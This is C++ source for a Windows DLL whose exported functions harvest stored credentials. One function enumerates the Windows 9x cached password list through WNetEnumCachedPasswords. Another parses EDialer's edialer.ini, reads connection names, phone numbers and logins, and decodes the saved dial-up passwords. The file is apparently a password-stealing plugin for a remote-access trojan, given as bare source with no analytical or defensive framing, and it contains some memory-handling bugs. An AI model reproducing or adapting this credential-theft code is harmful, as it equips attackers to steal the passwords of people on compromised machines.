#include <windows.h>
#pragma hdrstop
//-----------------------------------------------------------------------------
extern "C" __declspec(dllexport) char *test(char*);
extern "C" __declspec(dllexport) char *edial(char*);
extern "C" __declspec(dllexport) char *inet(char*);
//-----------------------------------------------------------------------------
int WINAPI DllEntryPoint(HINSTANCE hinst, unsigned long reason, void*)
{
    return 1;
}
//-----------------------------------------------------------------------------
struct PASSWORD_CACHE_ENTRY {
    WORD cbEntry;  
    WORD cbResource;
    WORD cbPassword;
    BYTE iEntry;    
    BYTE nType;     
    char abResource[1];
};

typedef BOOL (FAR PASCAL *CACHECALLBACK)( struct PASSWORD_CACHE_ENTRY FAR *pce, DWORD dwRefData );

DWORD APIENTRY WNetEnumCachedPasswords(LPSTR pbPrefix,WORD cbPrefix,BYTE nType,CACHECALLBACK pfnCallback,DWORD dwRefData);

typedef DWORD (WINAPI *ENUMPASSWORD)(LPSTR pbPrefix, WORD  cbPrefix, BYTE  nType, CACHECALLBACK pfnCallback, DWORD dwRefData);


ENUMPASSWORD pWNetEnumCachedPasswords;

typedef struct {
	char *pBuffer;
	int nBufLen;
	int nBufPos;
} PASSCACHECALLBACK_DATA;

//-----------------------------------------------------------------------------
BOOL PASCAL AddPass(struct PASSWORD_CACHE_ENTRY FAR *pce, DWORD dwRefData)
{
	char buff[1024];
	char buff2[1024];
	int nCount;

	PASSCACHECALLBACK_DATA *dat;
	dat = (PASSCACHECALLBACK_DATA *)dwRefData;
	
	nCount=pce->cbResource;
	if(nCount>1023) nCount=1023;
	memmove(buff, pce->abResource, nCount);
	buff[nCount] = 0;
	CharToOem(buff, buff2);
	if((dat->nBufPos+lstrlen(buff2))>=dat->nBufLen) return FALSE;
	lstrcpy(dat->pBuffer+dat->nBufPos,buff2);
	dat->nBufPos+=lstrlen(buff2)+1;

	nCount=pce->cbPassword;
	if(nCount>1023) nCount=1023;
	memmove(buff, pce->abResource+pce->cbResource, nCount);
	buff[nCount] = 0;
	CharToOem(buff, buff2);
	if((dat->nBufPos+lstrlen(buff2))>=dat->nBufLen) return FALSE;
	lstrcpy(dat->pBuffer+dat->nBufPos,buff2);
	dat->nBufPos+=lstrlen(buff2)+1;

	return TRUE;
}

char *CachedPass()
{
   HMODULE hLib=LoadLibrary("MPR.DLL");
   	
   PASSCACHECALLBACK_DATA dat;
   dat.pBuffer=(char *)malloc(65536);
   dat.nBufLen=65536;
   dat.nBufPos=0;
   pWNetEnumCachedPasswords = (ENUMPASSWORD)GetProcAddress(hLib, "WNetEnumCachedPasswords");
  
   pWNetEnumCachedPasswords(NULL, 0, 0xff, AddPass, (DWORD) &dat);		
   char *svStr;
   char *ret="";;
   svStr=dat.pBuffer;
   while(*svStr!='\0') {
	     char *svRsc=svStr;
		 svStr+=lstrlen(svStr)+1;
	   	 char *svPwd=svStr;
		 svStr+=lstrlen(svStr)+1;
		 char svBuff[1024];
		 wsprintf(svBuff, "%.256s : %.256s\x0D\x0A", svRsc, svPwd);
		 lstrcat(ret,svBuff);
   };
   
   FreeLibrary(hLib); 
   return ret;
};


char *test(char *buff)
{
     return buff;
}
void decpass(char *in,char *out)
{
	int l=lstrlen(in);
	for(int i=0;i<=l;i++)
	{
		out[i]=in[i]-((i+1)-1);
	};
	out[lstrlen(out)-1]='\0';
};
char *edial(char *buff)
{
	char path[256];
	char *ret;
	GetWindowsDirectory(path,256);
	lstrcat(path,"\\");
	lstrcat(path,"edialer.ini");
    HANDLE hFile=CreateFile(path,GENERIC_READ,0,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);	
	if(hFile==INVALID_HANDLE_VALUE)
	{
	   ret="Can't find EDialer on this computer!\x0D\x0A";
       return ret;
	};
    char svRe[4096];
	char svAnsw[4096]="ETypeDialer paswords:\x0D\x0A";
	int k=0;
	DWORD dwRead;
	ReadFile(hFile,svRe,4096,&dwRead,NULL);
	while(k<4096)
	{
		if((svRe[k]=='[')&&(svRe[k+1]=='R')&&(svRe[k+2]=='A')&&
			(svRe[k+3]=='S')&&(svRe[k+4]=='_')&&(svRe[k+5]=='E')&&
			(svRe[k+6]=='n')&&(svRe[k+7]=='t')&&(svRe[k+8]=='r')&&
			(svRe[k+9]=='y')&&(svRe[k+10]=='_'))
		{
			char name[256];int t=0;
			k+=11;
			while(svRe[k]!=']'){name[t]=svRe[k];t++;k++;};
			lstrcat(svAnsw,"Connection name - ");
			lstrcat(svAnsw,name);
			lstrcat(svAnsw,"\x0D\x0A");
			for(int i=0;i<=256;i++)
				name[i]=NULL;
		};
		if((svRe[k]=='P')&&(svRe[k+1]=='h')&&(svRe[k+2]=='o')&&(svRe[k+3]=='n')&&
			(svRe[k+4]=='e')&&(svRe[k+5]=='_'))
		{
			char temp[256];int i=k+5,z=1;
			while(svRe[i]!='='){temp[z]=svRe[i];z++;i++;};
			z++;
			if(z<9)
			{
				i=0;z-=2;k+=z;k+=6;
				if(svRe[k+1]!='\n')
				{
				   while(svRe[k]!='\n'){temp[i]=svRe[k];i++;k++;};
				   lstrcat(svAnsw,"Phone - ");lstrcat(svAnsw,temp);lstrcat(svAnsw,"\x0D\x0A");
				};
			};
			for(i=0;i<=256;i++)
				temp[i]=NULL;
		};
		if((svRe[k]=='P')&&(svRe[k+1]=='a')&&(svRe[k+2]=='s')&&(svRe[k+3]=='s')&&
			(svRe[k+4]=='w')&&(svRe[k+5]=='o')&&(svRe[k+6]=='r')&&(svRe[k+7]=='d')&&
			(svRe[k+8]=='S')&&(svRe[k+9]=='a')&&(svRe[k+10]=='v')&&(svRe[k+11]=='e')&&
			(svRe[k+12]=='d')&&(svRe[k+13]=='='))
		{
			char svPass[256];char svPass2[256];
			int i=0;k+=14;
			while(svRe[k]!='\n'){svPass[i]=svRe[k];i++;k++;};
			decpass(svPass,svPass2);
			svPass2[lstrlen(svPass2)-1]='\0';
			lstrcat(svAnsw,"Password - ");lstrcat(svAnsw,svPass2);lstrcat(svAnsw,"\x0D\x0A");
			for(i=0;i<=256;i++)
				svPass[i]=NULL;
			for(i=0;i<=256;i++)
				svPass2[i]=NULL;
		};
		if((svRe[k]=='L')&&(svRe[k+1]=='o')&&(svRe[k+2]=='g')&&(svRe[k+3]=='i')&&(svRe[k+4]=='n')&&
			(svRe[k+5]=='S')&&(svRe[k+6]=='a')&&(svRe[k+7]=='v')&&(svRe[k+8]=='e')&&(svRe[k+9]=='d')&&
			(svRe[k+10]=='='))
		{
            char login[256];
			int i=0;k+=11;
			while(svRe[k]!='\n'){login[i]=svRe[k];i++;k++;};
			lstrcat(svAnsw,"Login - ");lstrcat(svAnsw,login);lstrcat(svAnsw,"\x0D\x0A");
			for(i=0;i<=256;i++)
				login[i]=NULL;
		};
		k++;
	};
	CloseHandle(hFile);
	ret=svAnsw;
    return ret;
};
char *inet(char *buff)
{
    char *ret="Can't get catched internet passwords!\x0D\x0A";
    if((int)GetVersion() < 0)
	{
		lstrcpy(ret,"Cached passwords:\x0D\x0A");
		lstrcat(ret,CachedPass());
	};
	return ret;
};

